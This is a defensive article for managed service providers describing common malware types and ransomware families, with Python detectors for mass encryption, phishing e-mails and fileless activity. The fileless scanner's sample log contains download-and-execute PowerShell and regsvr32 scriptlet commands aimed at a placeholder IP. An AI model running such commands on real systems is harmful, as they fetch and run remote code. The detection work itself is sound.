As MSPs continue to scale up their clients' cybersecurity resources, cybercriminals are not taking it lying down. They are responding with more sophisticated malware. In 2019, for instance, 66% of managed service providers surveyed in a global study reported that their clients had been hit by the well-known CryptoLocker ransomware, while 49% had been affected by WannaCry.
Other prevalent types of malware attacks that were reported include CryptoWall (34%), Locky (24%), Petya (17%), CryptXXX (14%), and NotPetya (12%).
Because of such worrying trends, we have prepared a comprehensive guide to the common types of malware attacks that MSP clients are experiencing today.
But, before we dive into all that, let’s get the basics right. What exactly is malware?
What Is Malware?
As the word itself suggests, malware is a compound of "malicious" and "software", and that is precisely what it means.
In essence, malware is any software written to attack, infiltrate or damage computer systems. Common types include adware, worms, Trojan horses, spyware, ransomware and viruses.
Let’s look into each one of them.
Common Types of Malware Attacks
Adware is intrusive software built to deliver display ads such as pop-ups and website banners. You will mostly find it bundled with freeware or free-service websites, where it generates revenue from ad views.
Real-world examples of adware include DeskAd, Gator, DollarRevenue, Appearch, and Fireball.
While adware exists to generate revenue from intrusive ads, malvertising uses legitimate advertising networks as camouflage: the malicious ad looks like any other, and the payload is delivered when you interact with it or, in some cases, simply when the ad loads (a drive-by download).
Consider, for instance, an ad banner that redirects you to a malicious site when you click on it.
Other real-world malvertising techniques include malware on the ad's landing page, malware embedded in Flash video ads, malware hidden behind a tracking pixel, and malware injected after the click.
Hybrids blend two or more different types of malware. You might, for instance, come across a Trojan horse that uses malvertising to disguise itself.
Another common hybrid is the bot: an infected device that joins a botnet under the attacker's command and control and is then used to launch distributed denial-of-service attacks, infect further devices, send spam and steal data.
Real-world examples include Kelihos, Mariposa, Waledac, Zeus, and Conficker.
Ransomware takes over a computer by encrypting its files and then demands a ransom from the user. The objective is to convince victims to pay, usually in cryptocurrency, in order to regain access to their encrypted files; paying does not guarantee that they are restored.
Common Types of Ransomware
Ransomware comes in many families and strains. You might particularly want to look out for these notoriously common variants:
- ZCryptor: Behaves like a worm. It copies itself to removable and network drives, then encrypts files on the infected computers.
- WannaCry: Has so far hit more than 125,000 companies across over 150 countries. It spreads by exploiting the EternalBlue SMBv1 vulnerability in Windows, which Microsoft had patched as MS17-010 before the outbreak.
- CryptoLocker / TorrentLocker: Distributed via spam emails; once running, encrypts the victim's files with AES, keeping the key on the attacker's side.
- TeslaCrypt: Delivered through exploit kits that abuse Adobe Flash vulnerabilities. Like CryptoLocker, it encrypts files with AES.
- Spider: Arrives as malicious macros concealed in a Word document, usually distributed as a debt collection notice via spam email.
- Ryuk: Reportedly responsible for over 30% of ransomware attacks in 2020, Ryuk goes after critical files in organizations and is usually deployed by hand once the attackers already have a foothold in the network.
- Petya: Overwrites the master boot record with its own boot loader and encrypts the NTFS master file table, leaving the OS unbootable even though individual files are not encrypted.
- NotPetya: Looks like Petya and displays a ransom note, but its encryption cannot be reversed even if the ransom is paid, so it functions as a wiper rather than true ransomware.
- Locky: Often arrives as a spam email with a scrambled-looking "invoice" attachment; enabling macros to "fix" the document runs the downloader that encrypts the victim's files.
- KeRanger: Probably the first fully functional ransomware for macOS; it was distributed in a trojanized build of the Transmission BitTorrent client and encrypts the user's files.
- Jigsaw: Once it has encrypted files, Jigsaw progressively deletes them until the ransom is paid.
- GoldenEye: A Petya variant that targets human resources departments with fake job applications. Once the attachment is opened, a macro deploys it; it encrypts files and overwrites the master boot record with a custom boot loader.
- Crysis: Uses strong encryption against files on fixed, removable and network drives.
- CryptoWall: Arrives as a Trojan delivered via spam or exploit kits.
- Cerber: Sold as ransomware-as-a-service; one notable campaign targeted Microsoft 365 (then Office 365) users with malicious email attachments.
- Bad Rabbit: Disguises itself as an Adobe Flash update on malicious websites.
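The families above share one observable behaviour: a single process rewrites many user files in quick succession, the new contents look like random bytes (AES output has close to 8 bits of entropy per byte), and the files usually get a new extension. The following detector is an added example written for this article, not MSP360 code or any product's detection logic. It assumes a feed of file events (path, rename source, bytes written) such as an EDR or file-system filter would supply; the process names, paths and events below are constructed, and the thresholds are illustrative.

```python
"""Heuristic detector for ransomware-style mass encryption, run over file events.

Added example for this article, not code from MSP360 or any product. The event
records and the process/file names below are constructed for illustration.
"""
import math
from collections import Counter, defaultdict, deque
from dataclasses import dataclass
from os.path import splitext
from random import Random
from typing import List, Optional

ENTROPY_THRESHOLD = 7.5   # bits/byte; AES output is ~8.0, documents and source are far lower
BURST_THRESHOLD = 5       # this many suspicious writes by one process inside WINDOW_SECONDS
WINDOW_SECONDS = 60.0


@dataclass
class FileEvent:
    ts: float                    # seconds since epoch
    pid: int
    process: str
    path: str                    # path after the operation
    renamed_from: Optional[str]  # original path if the file was renamed, else None
    data: bytes                  # bytes written (the first block is enough in practice)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or single-valued input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_suspicious(ev: FileEvent) -> bool:
    """A rename that changes the extension AND high-entropy content is the signature
    of CryptoLocker/Locky-style encryption. Plain copies and JPEG saves keep their
    extension, so they are not flagged even though their content is high-entropy."""
    if ev.renamed_from is None:
        return False
    old_ext = splitext(ev.renamed_from)[1].lower()
    new_ext = splitext(ev.path)[1].lower()
    return old_ext != new_ext and shannon_entropy(ev.data) >= ENTROPY_THRESHOLD


def detect_bursts(events: List[FileEvent]) -> List[dict]:
    """Sliding-window count of suspicious events per process; one alert per pid."""
    windows = defaultdict(deque)
    alerted, alerts = set(), []
    for ev in sorted(events, key=lambda e: e.ts):
        if not is_suspicious(ev):
            continue
        q = windows[ev.pid]
        q.append(ev.ts)
        while q and ev.ts - q[0] > WINDOW_SECONDS:
            q.popleft()
        if len(q) >= BURST_THRESHOLD and ev.pid not in alerted:
            alerted.add(ev.pid)
            alerts.append({"pid": ev.pid, "process": ev.process, "ts": ev.ts, "count": len(q)})
    return alerts


# --- constructed sample telemetry (not real logs) ---------------------------------
_rng = Random(7)


def _random_bytes(n: int) -> bytes:   # stands in for ciphertext
    return bytes(_rng.getrandbits(8) for _ in range(n))


SAMPLE_EVENTS = [
    # ordinary document save: no rename, low entropy
    FileEvent(1000.0, 1201, "WINWORD.EXE", r"C:\Users\a\report.docx", None,
              b"Quarterly report " * 200),
    # photo copied to a new name: high entropy, but the extension is unchanged
    FileEvent(1001.0, 1202, "explorer.exe", r"C:\Users\a\photo_copy.jpg",
              r"C:\Users\a\photo.jpg", _random_bytes(4096)),
]
# hypothetical payload process renaming and overwriting six user files, one per second
for _i, _name in enumerate(["budget.xlsx", "notes.txt", "cv.docx", "scan.pdf", "deck.pptx", "keys.kdbx"]):
    SAMPLE_EVENTS.append(FileEvent(1010.0 + _i, 4242, "invoice_macro_payload.exe",
                                   rf"C:\Users\a\{_name}.locky", rf"C:\Users\a\{_name}",
                                   _random_bytes(4096)))


if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']} {alert['process']}: "
              f"{alert['count']} suspicious writes within {WINDOW_SECONDS:.0f}s")
```

Two design points: the extension check alone would miss families that keep file names, and the entropy check alone fires on every JPEG, ZIP or encrypted archive the user legitimately writes, so the detector requires both signals and a burst from one process before alerting. Canary files (decoy documents that no legitimate process should ever rewrite) are a complementary signal that catches families this heuristic misses.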
Phishing attacks use fraudulent messages, websites or web forms that impersonate a reputable company. If you fall for it, you end up submitting private information such as card numbers and passwords, or opening an attachment that installs malware.
Types of phishing
There are three common types of phishing attack:
- Spear phishing: Instead of going for a large group of people at random, this attack targets a specific individual, so the message is personalized.
- Whaling: A much more professional-looking fraudulent message that targets a company's top-level executives.
- Clone phishing: Reproduces a legitimate email the victim has already received, with the links or attachments swapped for malicious ones.
Real-world examples of phishing include wire transfer scams, Craigslist money scams, deactivation scares, Nigerian scams, tech support scams, and SEO trojans.
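The impersonation described above leaves traces that can be checked mechanically before a user ever sees the message: a display name that claims a brand the sending domain does not belong to, a Reply-To that diverts answers elsewhere, and links whose visible text shows one site while the href goes to another. The triage function below is an added example written for this article, not MSP360 code. The brand allowlist is hypothetical, the two messages are constructed, and the `.example` domains are reserved names that never resolve; the registrable-domain helper is a deliberate simplification (it ignores multi-label suffixes such as co.uk).

```python
"""Header and link heuristics for triaging a suspected phishing e-mail.

Added example for this article, not MSP360 code. The brand allowlist and both
messages below are constructed; ".example" domains are reserved and never resolve.
"""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# hypothetical allowlist: brand a display name may claim -> domain allowed to send as it
BRAND_DOMAINS = {"paypal": "paypal.com", "microsoft": "microsoft.com"}


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname (simplification: ignores suffixes like co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


class LinkExtractor(HTMLParser):
    """Collects (href, visible text) for every <a> element in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyse(raw_message: str) -> List[Tuple[str, str]]:
    """Return (rule, detail) findings; an empty list means no heuristic fired."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings: List[Tuple[str, str]] = []

    display_name, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = from_addr.rpartition("@")[2].lower()
    # display name claims a brand, but the sender domain is not that brand's
    for brand, domain in BRAND_DOMAINS.items():
        if brand in display_name.lower() and registrable_domain(from_domain) != domain:
            findings.append(("brand-name-mismatch", f"'{display_name}' sent from {from_domain}"))

    # replies diverted to a mailbox outside the sender's domain
    reply_addr = parseaddr(str(msg.get("Reply-To", "")))[1]
    reply_domain = reply_addr.rpartition("@")[2].lower()
    if reply_addr and reply_domain != from_domain:
        findings.append(("reply-to-mismatch", f"replies go to {reply_domain}, not {from_domain}"))

    # link text shows one site, href goes to another; punycode hosts hide homoglyphs
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is not None:
        parser = LinkExtractor()
        parser.feed(html_part.get_content())
        for href, text in parser.links:
            href_host = urlparse(href).hostname or ""
            if "xn--" in href_host:
                findings.append(("punycode-host", href_host))
            if "." in text and " " not in text:   # anchor text that looks like a URL or domain
                text_host = urlparse(text if "://" in text else "http://" + text).hostname or ""
                if registrable_domain(text_host) != registrable_domain(href_host):
                    findings.append(("link-target-mismatch",
                                     f"shows {text_host}, goes to {href_host}"))
    return findings


# --- constructed sample messages (not real mail) ----------------------------------
SAMPLE_PHISH = "\n".join([
    'From: "PayPal Security" <alerts@paypa1-verify.example>',
    "Reply-To: collect@mailbox.example",
    "To: victim@corp.example",
    "Subject: Your account has been limited - verify within 24 hours",
    "MIME-Version: 1.0",
    'Content-Type: text/html; charset="utf-8"',
    "",
    "<html><body><p>We detected unusual activity. Confirm your identity at",
    '<a href="http://secure-login.paypa1.example/verify">https://www.paypal.com/signin</a>',
    "or your account will be closed.</p></body></html>",
])

SAMPLE_LEGIT = "\n".join([
    'From: "Alice Example" <alice@corp.example>',
    "To: bob@corp.example",
    "Subject: Lunch?",
    'Content-Type: text/plain; charset="utf-8"',
    "",
    "Noon at the usual place?",
])

if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_PHISH):
        print(f"{rule}: {detail}")
```

These checks are cheap enough to run on every inbound message and complement, rather than replace, SPF/DKIM/DMARC: a lookalike domain such as paypa1-verify.example can pass all three authentication checks perfectly well, because the attacker controls it.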
A rootkit hides its own presence, and that of other malware, by subverting the operating system or its security tools. That means an attacker can retain remote access to your system and harvest data without leaving obvious signs of infiltration.
Real-world examples of rootkit include Rkit, Adore, and Knark.
Spyware keeps tabs on your activities while running stealthily in the background, logging keystrokes and harvesting sensitive data.
Real-world examples of spyware include BlazeFind, Internet Optimizer, ISTbar/AUpdate, 180search Assistant, Gator (GAIN), and CoolWebSearch.
A Trojan horse, or trojan for short, disguises itself as a legitimate application and so tricks victims into installing the malware on their own systems.
Notable examples of Trojan horse malware include Tiny Banker Trojan, ZeroAccess, MEMZ, DarkComet, Magic Lantern, and FinFisher.
A virus is malware that attaches itself to a legitimate file or program; when that host runs, the virus replicates within the system and spreads the infection to other connected devices.
Some famous real-world computer viruses include Melissa, Win32.Cabanas, Bizatch, WinVir and Stuxnet.
Unlike a virus, a computer worm replicates itself and spreads on its own, without a host program or human action to activate it. That means it can wreak havoc across a network entirely unattended.
Real-world examples of computer worms include Anna Kournikova, MyDoom, and ILOVEYOU.
Social engineering attacks attempt to manipulate victims through psychological tricks. And, in particular, attackers are quite fond of preying on human emotions to trick their victims.
Some of the common real-world social engineering techniques include pretexting, scareware, and baiting.
As the name suggests, fileless malware is not dropped as a standalone file on disk. Instead, it runs in memory by abusing legitimate programs that are already present, such as PowerShell, WMI or the Windows registry, which leaves little on disk for file-based antivirus to scan.
Real-world examples of fileless malware include Astaroth, Misfox, WannaMine, Operation Cobalt Kitty, and The Dark Avenger.
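Because fileless malware leaves little on disk, the practical place to catch it is process-creation telemetry: an Office application spawning PowerShell, a base64 `-EncodedCommand` that hides a download-and-execute one-liner, or a living-off-the-land binary such as regsvr32 fetching a scriptlet from the network. The scanner below is an added example written for this article, not MSP360 code or any vendor's rule set. It assumes a simplified pipe-delimited process-creation log (timestamp|parent|image|command line); the three log lines are constructed, and 203.0.113.5 is from a documentation address range that never routes.

```python
"""Process-creation heuristics for fileless / living-off-the-land activity.

Added example for this article, not MSP360 code. The log lines are constructed to
resemble a simplified process-creation record (timestamp|parent|image|command line);
203.0.113.0/24 is a documentation address range that never routes.
"""
import base64
import re
from typing import List, Optional, Tuple

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "certutil.exe", "wmic.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -e, -ec, -en, -enc, -encodedcommand: every prefix PowerShell accepts for -EncodedCommand
ENCODED_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

SUSPICIOUS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web-download": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy-bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "regsvr32-scriptlet": re.compile(r"regsvr32.*scrobj\.dll", re.I),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return it or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(parent: str, image: str, cmdline: str) -> List[str]:
    """Reasons this process-creation event looks like fileless tradecraft (empty if none)."""
    reasons: List[str] = []
    if basename(parent) in OFFICE_PARENTS and basename(image) in LOLBINS:
        reasons.append("office-spawned-lolbin")
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        text = cmdline
    else:
        reasons.append("encoded-command")
        # replace the base64 blob with its plaintext so the token rules see what will run
        text = ENCODED_FLAG.sub(" ", cmdline) + " " + decoded
    reasons += [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
    return reasons


def scan_log(log_text: str) -> List[Tuple[int, List[str]]]:
    """Return (line number, reasons) for every flagged line of a pipe-delimited log."""
    flagged = []
    for lineno, line in enumerate(log_text.strip().splitlines(), start=1):
        _ts, parent, image, cmdline = line.split("|", 3)
        reasons = analyse_event(parent, image, cmdline)
        if reasons:
            flagged.append((lineno, reasons))
    return flagged


# --- constructed sample log (not real telemetry) ----------------------------------
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = f"""
2024-05-01T09:00:01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoProfile -Command Get-Date
2024-05-01T09:02:17|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -enc {ENCODED}
2024-05-01T09:02:19|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll
"""

if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The decoding step matters more than the token list: an analyst who only greps raw command lines never sees `DownloadString` inside the base64 blob. The same event data also makes the countermeasures concrete: PowerShell script block logging and constrained language mode, blocking Office applications from spawning child processes, and alerting on regsvr32, mshta and rundll32 reaching out to the network.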
Malware Chart for MSPs
| Malware Type | What It Does | Real-World Example |
|---|---|---|
| Adware | Delivers intrusive display ads such as pop-ups and website banners. | DeskAd |
| Malvertising | Uses legitimate ad networks as camouflage for a malicious payload. | Malware within Flash video ads |
| Hybrid | A blend of two or more different types of malware. | Zeus |
| Ransomware | Encrypts computer files, then demands a ransom. | CryptoLocker |
| Phishing | Fraudulent messages that impersonate a legitimate sender. | Nigerian scams |
| Rootkit | Hides its presence and that of other malware to keep unauthorized access undetected. | Knark |
| Spyware | Monitors your activities while running stealthily in the background. | Gator |
| Trojan horse | Disguises itself as a legitimate application to get installed. | DarkComet |
| Virus | Attaches to a host file; once run, replicates within the system and spreads to other connected computers. | Melissa |
| Worm | Replicates itself without human activation and spreads independently across devices. | MyDoom |
| Social engineering | Manipulates victims through psychological tricks. | Pretexting |
| Fileless malware | Runs in memory by abusing legitimate programs, leaving little footprint on disk. | The Dark Avenger |
How To Protect Your Business from Malware
So far, we have seen that MSP clients are still falling victim to different types of malware despite using cybersecurity tools such as pop-up blockers, email filters, antivirus software and endpoint detection platforms. On their own, these are proving insufficient against the rising number of malware attacks.
Hence, you might want to take a different approach and adopt a multi-layered framework: one that combines cybersecurity tools with disaster recovery and business continuity solutions.
You could, for instance, combine firewalls, end-user training, anti-malware and antivirus software, email and web filtering, patch and update management, network monitoring, and managed detection and response services.
And as the Last Line of Defence...
To top it all off, reinforce your cybersecurity framework with managed backup: an automated backup solution such as MSP360 Managed Backup that centralizes your backup and monitoring tasks, so that encrypted or destroyed files can be restored without paying a ransom. Keep at least one copy offline or immutable, because ransomware operators routinely look for reachable backups and encrypt or delete them first.